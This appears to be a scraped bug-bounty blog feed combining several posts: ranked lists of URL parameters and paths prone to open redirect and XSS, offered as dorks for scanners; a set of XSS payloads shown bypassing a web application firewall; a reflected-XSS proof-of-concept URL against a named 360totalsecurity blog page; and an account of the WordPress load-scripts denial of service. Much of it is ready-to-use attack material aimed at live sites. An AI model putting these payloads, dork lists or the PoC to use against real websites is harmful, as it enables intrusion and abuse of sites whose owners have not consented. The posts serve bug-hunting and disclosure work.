Top 100 Open Redirect dorks


Just like previous list of XSS dorks but this time for Open Redirect vulnerabilities.

First with most common parameters then parameters along with path.

page 19.3%
url 13.1%
ret 10.0%
r2 9.8%
img 7.0%
u 4.4%
return 2.6%
r 2.6%
URL 2.4%
next 2.0%
redirect 2.0%
redirectBack 1.6%
AuthState 1.2%
referer 0.8%
redir 0.8%
l 0.8%
aspxerrorpath 0.6%
image_path 0.6%
ActionCodeURL 0.6%
return_url 0.6%
link 0.6%
q 0.6%
location 0.6%
ReturnUrl 0.6%
uri 0.4%
referrer 0.4%
returnUrl 0.4%
forward 0.4%
file 0.4%
rb 0.4%
end_display 0.4%
urlact 0.4%
from 0.4%
goto 0.4%
path 0.4%
redirect_url 0.4%
old 0.4%
pathlocation 0.2%
successTarget 0.2%
returnURL 0.2%
urlsito 0.2%
newurl 0.2%
Url 0.2%
back 0.2%
retour 0.2%
odkazujuca_linka 0.2%
r_link 0.2%
cur_url 0.2%
H_name 0.2%
ref 0.2%
topic 0.2%
resource 0.2%
returnTo 0.2%
home 0.2%
node 0.2%
sUrl 0.2%
href 0.2%
linkurl 0.2%
returnto 0.2%
redirecturl 0.2%
SL 0.2%
st 0.2%
errorUrl 0.2%
media 0.2%
destination 0.2%
targeturl 0.2%
return_to 0.2%
cancel_url 0.2%
doc 0.2%
GO 0.2%
ReturnTo 0.2%
anything 0.2%
FileName 0.2%
logoutRedirectURL 0.2%
list 0.2%
startUrl 0.2%
service 0.2%
redirect_to 0.2%
end_url 0.2%
_next 0.2%
noSuchEntryRedirect 0.2%
context 0.2%
returnurl 0.2%
ref_url 0.2%
/?page= 18.5
/index.php?ret= 10.0
/analytics/hit.php?r2= 9.8
/api/thumbnail?img= 7.0
/e.html?u= 3.2
/actions/act_continueapplication.cfm?r= 2.4
/redirect2/?url= 2.0
/Shibboleth.sso/Logout?return= 1.2
/ui/clear-selected/?next= 1.2
/Home/Redirect?url= 1.2
/jobs/?l= 0.8
/Error.aspx?aspxerrorpath= 0.6
/r.php?u= 0.6
/services/logo_handler.ashx?image_path= 0.6
/AddProduct.aspx?ActionCodeURL= 0.6
/tools/login/default.asp?page= 0.6
/spip.php?url= 0.6
/usermanagement/mailGeneratedPassword?referer= 0.6
/?return= 0.6
/?redir= 0.6
/simplesaml/module.php/core/loginuserpass.php?AuthState= 0.6
/out.php?url= 0.6
/affiche.php?uri= 0.4
/redirector.php?url= 0.4
/cgi/set_lang?referrer= 0.4
/blog/click?url= 0.4
/site.php?url= 0.4
/download2.php?file= 0.4
/jump.php?url= 0.4
/redirect/?redirect= 0.4
/admin/track/track?redirect= 0.4
/switch.php?rb= 0.4
/php-scripts/form-handler.php?end_display= 0.4
/cg/rk/?url= 0.4
/tosite.php?url= 0.4
/cambioidioma.php?urlact= 0.4
/accueil/spip.php?url= 0.4
/IRB/sd/Rooms/RoomComponents/LoginView/GetSessionAndBack?redirectBack= 0.4
/search?q= 0.4
/default.aspx?URL= 0.4
/initiate-sso-login/?redirect_url= 0.4
/module.php/core/loginuserpass.php?AuthState= 0.4
/authentication/check_login?old= 0.4
/RedirectToDoc.aspx?URL= 0.4
/shop/bannerhit.php?url= 0.4
/acceptcookies/?ReturnUrl= 0.4
/index.php?url= 0.4
/publang?url= 0.2
/home/helperpage?url= 0.2
/widgets.aspx?url= 0.2
/_lang/en?next= 0.2
/application/en?url= 0.2
/common/topcorm.do?pathlocation= 0.2
/main/action?successTarget= 0.2
/Videos/SetCulture?returnURL= 0.2
/Localize/ChangeLang?returnUrl= 0.2
/_goToSite.asp?urlsito= 0.2
/redir?url= 0.2
/admin/auth/logined?redirect= 0.2
/linkforward?forward= 0.2
/modules/babel/redirect.php?newurl= 0.2
/umbraco/Surface/LanguageSurface/ChangeLanguage?Url= 0.2
/langswitcher.php?url= 0.2
/redirect/?url= 0.2
/i18n/i18n_user_currencies/change_currency?back= 0.2
/accessibilite/textBackUp/?retour= 0.2
/fncBox.php?url= 0.2
/all4shop-akcie.php?odkazujuca_linka= 0.2
/openurl.php?url= 0.2
/te3/out.php?u= 0.2
/utils/set_language.html?return_url= 0.2
/trigger.php?r_link= 0.2
/home/lng?cur_url= 0.2
/goto?url= 0.2
/o.php?url= 0.2
/link-master/19/follow?link= 0.2
/hack.php?H_name= 0.2
/bmad/namhoc.php?return= 0.2
/maven/stats.asp?ref= 0.2
/Main/WebHome?topic= 0.2
/bin/fusion/imsLogin?resource= 0.2
/languechange.aspx?url= 0.2
/bloques/bannerclick.php?url= 0.2
/changesiteversion-full?referer= 0.2
/out.php?link= 0.2
/bgpage?r= 0.2
/signout?returnTo= 0.2
/switch_lang.php?return_url= 0.2
/nousername.php?redir= 0.2
/i/logout?return= 0.2
/util_goto_detail_home.cfm?home= 0.2
/misc/oldmenu.html?from= 0.2
/click.php?url= 0.2
/bitrix/rdc/?goto= 0.2
/?node= 0.2
/setLanguage.php?return= 0.2
/redirect/ad?url= 0.2
/redirect.php?sUrl= 0.2
/redirect?url= 0.2
/url?url= 0.2

XSS WAF Bypassed

</script><svg onload=alert(1)> = (Error)
</script><!–><svg onload%3Da%3Dalert,b%3D1,[b].find(a)> = (OK)

</script><svg onload=alert(1)> = (Error)
</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;> = (OK)

<a href=”javascript:alert(1)”>href</a> = (Error)
<A aAaAaAa AaAaAaA aAaA hReF%3D”%26%2301j%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;”>href</a> = (OK)

<input value=”testtest” onclick=”alert(1)”> = (Error)
<form><input formaction=javascript:alert(1) type=submit value=click> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src=x:alert(alt) onerror=eval(src) alt=1> = (OK)

‘-confirm(1)-‘ = (Error)
<!’/!”/\’/\”/*/-top[`con\x66irm`]`1`//><svg> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src onerror=%26emsp;prompt`${1}`> = (OK)

Thank’s You, And best regards!!!

Youtube : https://www.youtube.com/channel/UCyVj0erForx8gUDNAp8wzLw
Facebook : https://www.facebook.com/b4c0d
Gmail : [email protected]
Paypal : paypal.me/Rando784

Top 100 XSS dorks

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerables parameters.

It can be used as a powerful dork list so let’s update your scanners and get bounties!

First here is the list of most vulnerable parameters along with their frequency.

Dork Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same but with corresponding path :

Dork Frequency
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1

I hope you enjoy this 🙂

Congrats on 1000 badges OBB

Wanted to start my blogg by celebrating 1000 combined honor badges by OBB community! 🙂

hip hip horray!

Awesome job made by the community, if only the site owners could take submitted findings more seriously! Personally I find that a lot of alerted siteowners just seem to throw the information provided in their garbage, and it makes me sad.

Good luck next year everyone! may the hunt be bountiful!

-m00n

Reflected xss in 360totalsecurity

i have found vulnerability in 360totalsecurity ,is Reflected XSS in https://blog.360totalsecurity.com

Steps to reproduce :

Go to https://blog.360totalsecurity.com

and To : https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=Blog

and replace utm_source value by this XSS payload : x”><svG onLoad=prompt(document.domain)>

Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x“><svG onLoad=prompt(document.domain)>

Poc:

https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x“><svG onLoad=prompt(document.domain)>

Regards,

TAHA

Denial of Service vulnerability in script-loader.php (CVE-2018-6389)

The load-scripts.php file receives a parameter called load[], the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested

  What can be concluded from this URL, is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and be able to get multiple JS modules within the response.

   I wondered what would happen if I sent the server a request to supply me every JS module that it stored? A single request would cause the server to perform 181 I/O actions and provide the file contents in the response.

So I tried it, I sent the request to the server:

The server responded after 2.2 seconds, with almost 4MB of data, which made the server work really hard to process such a request.